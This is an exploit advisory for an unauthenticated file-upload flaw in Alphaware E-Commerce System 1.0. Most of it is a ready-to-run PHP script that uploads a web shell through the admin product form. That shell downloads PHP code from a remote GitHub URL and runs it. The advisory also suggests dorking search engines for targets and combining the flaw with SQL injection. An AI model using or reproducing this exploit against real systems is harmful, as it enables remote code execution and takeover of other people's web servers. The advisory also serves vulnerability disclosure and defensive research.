Headline
Alphaware E-Commerce System 1.0 Code Injection
Alphaware E-Commerce System version 1.0 suffers from a code injection vulnerability.
=============================================================================================================================================| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) { $file_name = "indoushka.php"; $webshell_payload = "<?php \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt'; \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$output = curl_exec(\$ch); curl_close(\$ch); if (\$output) { // Safely include the content of the remote PHP file include 'data://text/plain;base64,' . base64_encode(\$output); } ?>"; $post_fields = array( 'add' => '', 'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name), 'product_name' => 'inouva', 'product_price' => '123', 'product_size' => '99', 'brand' => 'N0_name', 'category' => 'Hackers', 'qty' => '1' ); echo "(+) PHP Code Injection ...\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "(+) Shell uploaded successfully.\n"; echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";}if ($argc != 2) { echo "(+) Usage: php " . $argv[0] . " <target ip>\n"; echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n"; exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/alphaware/photo/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================